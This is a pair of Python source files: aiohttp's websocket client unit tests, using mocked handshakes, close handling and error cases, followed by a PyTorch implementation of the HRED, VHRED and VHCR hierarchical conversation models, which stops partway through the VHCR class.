# tests/test_websocket_client.py
# from ajdavis/aiohttp @ d5138978f3e82aa82a2f003b00d38112c58a40c1 (Apache-2.0)
import asyncio
import base64
import hashlib
import os
import unittest
from unittest import mock
import aiohttp
from aiohttp import errors, hdrs, websocket, websocket_client
class TestWebSocketClient(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
self.key_data = os.urandom(16)
self.key = base64.b64encode(self.key_data)
self.ws_key = base64.b64encode(
hashlib.sha1(self.key + websocket.WS_KEY).digest()).decode()
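        # Per RFC 6455, the server proves the handshake by returning
        # base64(sha1(client_key + magic GUID)) in Sec-WebSocket-Accept;
        # the tests below compare against this precomputed value.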
def tearDown(self):
self.loop.close()
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
hdrs.SEC_WEBSOCKET_PROTOCOL: 'chat'
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
res = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertIsInstance(res, websocket_client.ClientWebSocketResponse)
self.assertEqual(res.protocol, 'chat')
self.assertNotIn(hdrs.ORIGIN, m_req.call_args[1]["headers"])
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_with_origin(self, m_req, m_os):
resp = mock.Mock()
resp.status = 403
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
origin = 'https://example.org/page.html'
with self.assertRaises(errors.WSServerHandshakeError):
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
loop=self.loop,
origin=origin))
self.assertIn(hdrs.ORIGIN, m_req.call_args[1]["headers"])
self.assertEqual(m_req.call_args[1]["headers"][hdrs.ORIGIN], origin)
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_custom_response(self, m_req, m_os):
class CustomResponse(websocket_client.ClientWebSocketResponse):
def read(self, decode=False):
return 'customized!'
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
res = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
ws_response_class=CustomResponse,
loop=self.loop))
self.assertEqual(res.read(), 'customized!')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_global_loop(self, m_req, m_os):
asyncio.set_event_loop(self.loop)
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
resp = self.loop.run_until_complete(
aiohttp.ws_connect('http://test.org'))
self.assertIs(resp._loop, self.loop)
asyncio.set_event_loop(None)
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_status(self, m_req, m_os):
resp = mock.Mock()
resp.status = 500
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid response status')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_upgrade(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: 'test',
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid upgrade header')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_conn(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: 'close',
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid connection header')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_challenge(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: 'asdfasdfasdfasdfasdfasdf'
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid challenge response')
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_close(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
writer = WebSocketWriter.return_value = mock.Mock()
reader = resp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect('http://test.org', loop=self.loop))
self.assertFalse(resp.closed)
msg = websocket.Message(websocket.MSG_CLOSE, b'', b'')
reader.read.return_value = asyncio.Future(loop=self.loop)
reader.read.return_value.set_result(msg)
res = self.loop.run_until_complete(resp.close())
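        # 1000 is the "normal closure" close code defined by RFC 6455.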
writer.close.assert_called_with(1000, b'')
self.assertTrue(resp.closed)
self.assertTrue(res)
self.assertIsNone(resp.exception())
# idempotent
res = self.loop.run_until_complete(resp.close())
self.assertFalse(res)
self.assertEqual(writer.close.call_count, 1)
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_close_exc(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
WebSocketWriter.return_value = mock.Mock()
reader = resp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
self.assertFalse(resp.closed)
exc = ValueError()
reader.read.return_value = asyncio.Future(loop=self.loop)
reader.read.return_value.set_exception(exc)
self.loop.run_until_complete(resp.close())
self.assertTrue(resp.closed)
self.assertIs(resp.exception(), exc)
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_close_exc2(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
writer = WebSocketWriter.return_value = mock.Mock()
resp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
self.assertFalse(resp.closed)
exc = ValueError()
writer.close.side_effect = exc
self.loop.run_until_complete(resp.close())
self.assertTrue(resp.closed)
self.assertIs(resp.exception(), exc)
resp._closed = False
writer.close.side_effect = asyncio.CancelledError()
self.assertRaises(asyncio.CancelledError,
self.loop.run_until_complete, resp.close())
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_send_data_after_close(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
WebSocketWriter.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
resp._closed = True
self.assertRaises(RuntimeError, resp.ping)
self.assertRaises(RuntimeError, resp.pong)
self.assertRaises(RuntimeError, resp.send_str, 's')
self.assertRaises(RuntimeError, resp.send_bytes, b'b')
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_send_data_type_errors(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
WebSocketWriter.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
self.assertRaises(TypeError, resp.send_str, b's')
self.assertRaises(TypeError, resp.send_bytes, 'b')
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_reader_read_exception(self, m_req, m_os, WebSocketWriter):
hresp = mock.Mock()
hresp.status = 101
hresp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(hresp)
WebSocketWriter.return_value = mock.Mock()
reader = hresp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
exc = ValueError()
reader.read.return_value = asyncio.Future(loop=self.loop)
reader.read.return_value.set_exception(exc)
msg = self.loop.run_until_complete(resp.receive())
self.assertEqual(msg.tp, aiohttp.MsgType.error)
self.assertIs(resp.exception(), exc)
def test_receive_runtime_err(self):
resp = websocket_client.ClientWebSocketResponse(
mock.Mock(), mock.Mock(), mock.Mock(), mock.Mock(), 10.0,
True, True, self.loop)
resp._waiting = True
self.assertRaises(
RuntimeError, self.loop.run_until_complete, resp.receive())
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_close_resp_on_err(self, m_req, m_os):
resp = mock.Mock()
resp.status = 500
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError):
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
resp.close.assert_called_with()
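
# Conventional entry point so the tests can be run directly (not part of the
# original file; a minimal sketch):
if __name__ == '__main__':
    unittest.main()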

# model/models.py
# from yinyan5988/A-Hierarchical-Latent-Structure-for-Variational-Conversation-Modeling
# @ 9fc96098498e80b91e7ca428786dea34dd392c96 (MIT)
import torch
import torch.nn as nn
from utils import to_var, pad, normal_kl_div, normal_logpdf, bag_of_words_loss, to_bow, EOS_ID
import layers
import numpy as np
import random
import pdb
VariationalModels = ['VHRED', 'VHCR', 'VHCR_new']
class HRED(nn.Module):
def __init__(self, config):
super(HRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def forward(self, input_sentences, input_sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
num_sentences = input_sentences.size(0)
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences, max_source_length, hidden_size * direction]
# encoder_hidden: [num_layers * direction, num_sentences, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(input_sentences,
input_sentence_length)
# encoder_hidden: [num_sentences, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(num_sentences, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1])), 0)
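        # e.g. input_conversation_length = [3, 2] -> start = [0, 3]: offsets of
        # each conversation's first sentence in the flat encoder_hidden tensor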
# encoder_hidden: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l), max_len)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# project context_outputs to decoder init state
decoder_init = self.context2decoder(context_outputs)
# [num_layers, batch_size, hidden_size]
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs
else:
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs.unsqueeze(1)
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# Get top prediction only
# [batch_size, max_unroll]
# prediction = prediction[:, 0]
# [batch_size, beam_size, max_unroll]
return prediction
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
        context_hidden = None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
decoder_init = self.context2decoder(context_outputs)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
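
# Hedged usage sketch (hypothetical `config` object carrying the fields read
# in __init__, e.g. vocab_size, embedding_size, encoder_hidden_size, rnn,
# num_layers, ...); not part of the original file:
#
#   model = HRED(config)
#   logits = model(input_sentences, input_sentence_length,
#                  input_conversation_length, target_sentences)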
class VHRED(nn.Module):
def __init__(self, config):
super(VHRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.prior_h = layers.FeedForward(config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_h = layers.FeedForward(config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.bow:
self.bow_h = layers.FeedForward(config.z_sent_size,
config.decoder_hidden_size,
num_layers=1,
hidden_size=config.decoder_hidden_size,
activation=config.activation)
self.bow_predict = nn.Linear(config.decoder_hidden_size, config.vocab_size)
def prior(self, context_outputs):
# Context dependent prior
h_prior = self.prior_h(context_outputs)
mu_prior = self.prior_mu(h_prior)
var_prior = self.softplus(self.prior_var(h_prior))
return mu_prior, var_prior
def posterior(self, context_outputs, encoder_hidden):
h_posterior = self.posterior_h(torch.cat([context_outputs, encoder_hidden], 1))
mu_posterior = self.posterior_mu(h_posterior)
var_posterior = self.softplus(self.posterior_var(h_posterior))
return mu_posterior, var_posterior
def compute_bow_loss(self, target_conversations):
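        # Auxiliary bag-of-words loss: predict the target words directly from
        # z_sent, a common remedy for posterior collapse in text VAEs.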
target_bow = np.stack([to_bow(sent, self.config.vocab_size) for conv in target_conversations for sent in conv], axis=0)
target_bow = to_var(torch.FloatTensor(target_bow))
bow_logits = self.bow_predict(self.bow_h(self.z_sent))
bow_loss = bag_of_words_loss(bow_logits, target_bow)
return bow_loss
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden_input,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
if not decode:
mu_posterior, var_posterior = self.posterior(
context_outputs, encoder_hidden_inference_flat)
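            # Reparameterization trick: z = mu + sigma * eps keeps the sample
            # differentiable w.r.t. the posterior parameters.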
z_sent = mu_posterior + torch.sqrt(var_posterior) * eps
log_q_zx = normal_logpdf(z_sent, mu_posterior, var_posterior).sum()
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
            # kl_div: [num_sentences]
kl_div = normal_kl_div(mu_posterior, var_posterior,
mu_prior, var_prior)
kl_div = torch.sum(kl_div)
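            # kl_div is the regularizer in the ELBO:
            # E_q[log p(x|z)] - KL(q(z|x) || p(z|context)).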
else:
z_sent = mu_prior + torch.sqrt(var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
log_q_zx = None
self.z_sent = z_sent
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
        context_hidden = None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
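
# Hedged reference (not in the original file): the closed-form KL divergence
# between diagonal Gaussians that `utils.normal_kl_div` is assumed to compute,
# spelled out for readers of the VHRED/VHCR losses above.
def _kl_diag_gaussian_reference(mu_q, var_q, mu_p, var_p):
    # KL(N(mu_q, var_q) || N(mu_p, var_p)), summed over the last dimension.
    return 0.5 * (torch.log(var_p / var_q)
                  + (var_q + (mu_q - mu_p) ** 2) / var_p
                  - 1.0).sum(dim=-1)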
class VHCR(nn.Module):
def __init__(self, config):
super(VHCR, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions + config.z_conv_size)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.unk_sent = nn.Parameter(torch.randn(context_input_size - config.z_conv_size))
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size + config.z_conv_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size,
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_h = layers.FeedForward(config.z_conv_size + config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
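    # The scalar prior mean/variance above broadcast against the
    # [batch_size, z_conv_size] noise sampled in forward().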
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
def sent_prior(self, context_outputs, z_conv):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
def sent_posterior(self, context_outputs, encoder_hidden, z_conv):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
